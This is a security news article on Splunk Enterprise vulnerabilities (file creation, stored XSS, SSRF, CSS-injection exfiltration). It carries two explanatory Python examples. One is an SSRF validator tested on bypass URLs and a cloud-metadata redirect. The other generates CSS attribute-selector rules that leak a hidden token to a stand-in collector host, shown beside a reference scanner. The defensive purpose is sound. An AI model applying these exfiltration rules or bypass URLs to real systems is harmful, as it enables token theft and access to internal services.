Splunk has disclosed multiple vulnerabilities in its Enterprise platform, including one critical issue, that could allow remote attackers to execute malicious scripts in users' browsers, exfiltrate sensitive data, and perform unauthorized file operations on the server.
Critical Vulnerabilities Identified
The most severe issue, identified as CVE-2026-20253 with a CVSS score of 9.8, affects Splunk Enterprise versions below 10.2.4 and 10.0.7. This vulnerability arises from missing authentication controls in a PostgreSQL sidecar service endpoint, enabling unauthenticated attackers to create or truncate arbitrary files. Such exploitation could lead to full system compromise, data destruction, or the persistence of malicious code without requiring user interaction.
Another high-severity vulnerability, CVE-2026-20258 (CVSS 7.1), involves stored cross-site scripting (XSS) in classic dashboards. A low-privileged user can inject malicious JavaScript into dashboard HTML panels, and the script executes in the browser of any user who views the dashboard. Exploitation requires user interaction: the attacker must get a victim, ideally one with higher privileges, to open the dashboard containing the injected content, for example through a crafted link.
Additional Vulnerabilities and Mitigations
Splunk also addressed a server-side request forgery (SSRF) vulnerability, CVE-2026-20252 (CVSS 7.6), in the Dashboard Studio PDF export feature. This flaw allows attackers to send requests to internal systems by bypassing domain validation using crafted subdomains or redirect chains, potentially exposing internal services or sensitive data.
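The two bypass classes named above, crafted subdomains and redirect chains, are worth seeing against concrete checks. The block below is an added illustration written for this article, not Splunk's code: it contrasts a weak substring-style domain check with a strict one that allows only exact allowlisted hosts, rejects protocol-relative and non-HTTP URLs, checks what the host resolves to, and re-validates every hop of a redirect chain instead of only the first URL. The allowlist, the resolver table and the redirect map are constructed stand-ins for DNS and for the remote server.

```python
from urllib.parse import urlparse
import ipaddress

# Constructed allowlist for the example (hypothetical; not a Splunk setting).
TRUSTED_DOMAINS = {"static.example.com", "dashboards.example.com"}
MAX_REDIRECTS = 5

# Constructed stand-in for DNS. "legacy.example.com" is allowlisted but points
# at an internal address, to show why the resolved address must be checked too.
RESOLVER = {
    "static.example.com": "93.184.216.34",
    "dashboards.example.com": "93.184.216.35",
    "legacy.example.com": "10.0.0.5",
    "attacker.net": "93.184.216.99",
}
TRUSTED_DOMAINS.add("legacy.example.com")

# Constructed stand-in for a remote server that answers with HTTP redirects.
REDIRECTS = {
    # open redirect on an allowlisted host pointing at a cloud metadata endpoint
    "https://static.example.com/open-redirect?to=meta": "http://169.254.169.254/latest/meta-data/",
    "https://static.example.com/hop1": "https://static.example.com/hop2",
    "https://static.example.com/hop2": "https://dashboards.example.com/final.pdf",
    "https://static.example.com/loop": "https://static.example.com/loop",
}


def naive_is_trusted(url):
    """The weak check an SSRF bypass targets: a substring match anywhere in the URL.
    Passes for attacker hosts that merely *contain* a trusted name."""
    return any(d in url for d in TRUSTED_DOMAINS)


def validate_target(url):
    """Return None if the URL may be fetched, otherwise a reason string."""
    p = urlparse(url)
    # Protocol-relative "//host/path" parses with an empty scheme and is rejected here,
    # as are file:, gopher: and similar schemes.
    if p.scheme not in ("http", "https"):
        return "scheme %r not allowed" % p.scheme
    host = (p.hostname or "").lower().rstrip(".")
    # Exact host match only: no suffix, prefix or substring matching, so
    # "static.example.com.attacker.net" and "static.example.com@attacker.net" fail.
    if host not in TRUSTED_DOMAINS:
        return "host %r not in allowlist" % host
    ip_text = RESOLVER.get(host)
    if ip_text is None:
        return "host %r does not resolve" % host
    ip = ipaddress.ip_address(ip_text)
    # An allowlisted name that resolves to a private, loopback or link-local address
    # would still turn the fetch into an internal request.
    if not ip.is_global:
        return "host %r resolves to non-public address %s" % (host, ip)
    return None


def fetch_with_validation(url):
    """Follow redirects manually and validate every hop.
    Returns (ok, final_url_or_reason, hops_visited)."""
    hops = [url]
    for _ in range(MAX_REDIRECTS + 1):
        reason = validate_target(hops[-1])
        if reason:
            return False, reason, hops
        nxt = REDIRECTS.get(hops[-1])
        if nxt is None:
            return True, hops[-1], hops
        hops.append(nxt)
    return False, "too many redirects", hops


if __name__ == "__main__":
    for u in ("https://static.example.com.attacker.net/x",
              "https://static.example.com@attacker.net/",
              "https://attacker.net/?q=static.example.com",
              "//static.example.com/x",
              "https://legacy.example.com/"):
        print(u, "naive:", naive_is_trusted(u), "strict:", validate_target(u))
    print(fetch_with_validation("https://static.example.com/open-redirect?to=meta"))
    print(fetch_with_validation("https://static.example.com/hop1"))
```

The redirect handling is the part most often missed: HTTP client libraries follow redirects transparently by default, so a single validation of the user-supplied URL says nothing about where the request finally lands. Disabling automatic redirects and validating each hop, as above, is the check a PDF or report export feature needs.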
Several medium-severity vulnerabilities (CVE-2026-20254, CVE-2026-20255, CVE-2026-20256, and CVE-2026-20257) affect classic dashboards and stem from improper input validation. These issues enable data exfiltration via CSS injection, protocol-relative URLs, and insufficient validation of external content. In these scenarios, attackers with low privileges can craft malicious dashboards that extract sensitive data when accessed by higher-privileged users.
For example, an attacker could create a dashboard containing a hidden request to an external server. When an administrator views the dashboard, sensitive session data or tokens could be silently transmitted to the attacker-controlled domain.
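To make the CSS-injection and protocol-relative-URL cases from the previous two paragraphs concrete, here is an added example written for this article, not code from Splunk or from the advisory. The first half models the attacker side: a CSS attribute-selector rule set that leaks one character of an attribute value per round, with a toy model of which `url()` requests a browser would issue. The second half models the defender side: a scanner that lists every outbound reference in a panel's HTML/CSS and classifies it as local, protocol-relative, trusted or external. The collector host, the panel markup and the allowlist are all constructed.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist (hypothetical; not a Splunk setting).
TRUSTED_DOMAINS = {"static.example.com"}
ALPHABET = "0123456789abcdef"


def exfil_css(attr_name, known_prefix, collector):
    """Attacker side. One rule per candidate next character; only the rule whose
    value^= prefix matches the real attribute value triggers a request, and the
    request path tells the collector which character it was."""
    rules = []
    for ch in ALPHABET:
        rules.append('input[name="%s"][value^="%s%s"]{background:url(%s/%s%s)}'
                     % (attr_name, known_prefix, ch, collector, known_prefix, ch))
    return "\n".join(rules)


_RULE = re.compile(r'\[name="([^"]+)"\]\[value\^="([^"]*)"\]\{background:url\(([^)]+)\)\}')


def simulate_browser(css, attr_name, secret):
    """Toy model of the browser: a rule fires when its value^= prefix is a prefix
    of the element's attribute value. Returns the URLs that would be requested."""
    fired = []
    for name, prefix, url in _RULE.findall(css):
        if name == attr_name and secret.startswith(prefix):
            fired.append(url)
    return fired


def recover_secret(attr_name, secret, collector, length):
    """Drive the attack end to end; each round leaks one more character."""
    prefix = ""
    for _ in range(length):
        fired = simulate_browser(exfil_css(attr_name, prefix, collector), attr_name, secret)
        if len(fired) != 1:
            break
        prefix = fired[0].rsplit("/", 1)[1]
    return prefix


# Defender side: every place markup or CSS can name a remote resource.
_URL_REF = re.compile(r'''(?:url\(\s*['"]?|(?:src|href)\s*=\s*['"])([^'")\s]+)''', re.I)


def external_references(markup):
    """List outbound references in a panel and classify each one."""
    findings = []
    for ref in _URL_REF.findall(markup):
        p = urlparse(ref)
        host = (p.hostname or "").lower()
        if not p.scheme and not p.netloc:
            kind = "local"                # relative path, stays on the Splunk origin
        elif ref.startswith("//"):
            kind = "protocol-relative"    # inherits the scheme, goes to an arbitrary host
        elif p.scheme in ("http", "https") and host in TRUSTED_DOMAINS:
            kind = "trusted"
        else:
            kind = "external"             # off-allowlist host or a non-http scheme
        findings.append({"ref": ref, "host": host, "kind": kind})
    return findings


# Constructed panel: an injected style block, a legitimate logo, a local asset,
# and a hidden input whose value the CSS targets.
SAMPLE_PANEL = """
<style>
input[name="token"][value^="a"]{background:url(//collector.attacker.example/a)}
</style>
<img src="https://static.example.com/logo.png">
<img src="/static/local.png">
<input type="hidden" name="token" value="a3f9">
"""

if __name__ == "__main__":
    print(recover_secret("token", "a3f9", "https://collector.attacker.example", 4))
    for f in external_references(SAMPLE_PANEL):
        print(f)
```

Two caveats on what this models. CSS attribute selectors see attribute values as written in the markup (hidden inputs, CSRF tokens, data- attributes), not live JavaScript state, so the leak works against whatever the dashboard renders into attributes. And a protocol-relative `//host` reference is not "local" just because it lacks `https:`; it resolves to whatever host follows the slashes, which is why the scanner reports it separately rather than letting it fall through a scheme-based check.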
Apart from the sidecar file-creation issue, these vulnerabilities affect Splunk Web components and require some level of user interaction or a permissive configuration, such as allowing embeddable HTML content in dashboards or insufficiently restricting the trusted domains that dashboard content may reference.
Splunk has released patches to address these vulnerabilities. Users are strongly advised to update their installations to the latest versions to mitigate potential risks.
These vulnerabilities underscore the importance of regular software updates and vigilant security practices. Organizations using Splunk Enterprise should prioritize applying these patches to protect their systems from potential exploits.
Source: CyberSecurityNews